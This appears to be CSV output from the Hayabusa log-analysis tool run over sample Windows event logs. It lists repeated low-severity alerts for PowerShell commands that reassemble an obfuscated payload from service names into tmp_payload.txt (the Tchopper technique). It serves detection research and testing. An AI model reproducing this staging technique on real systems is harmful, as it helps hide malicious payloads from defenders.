+2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:24.615 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
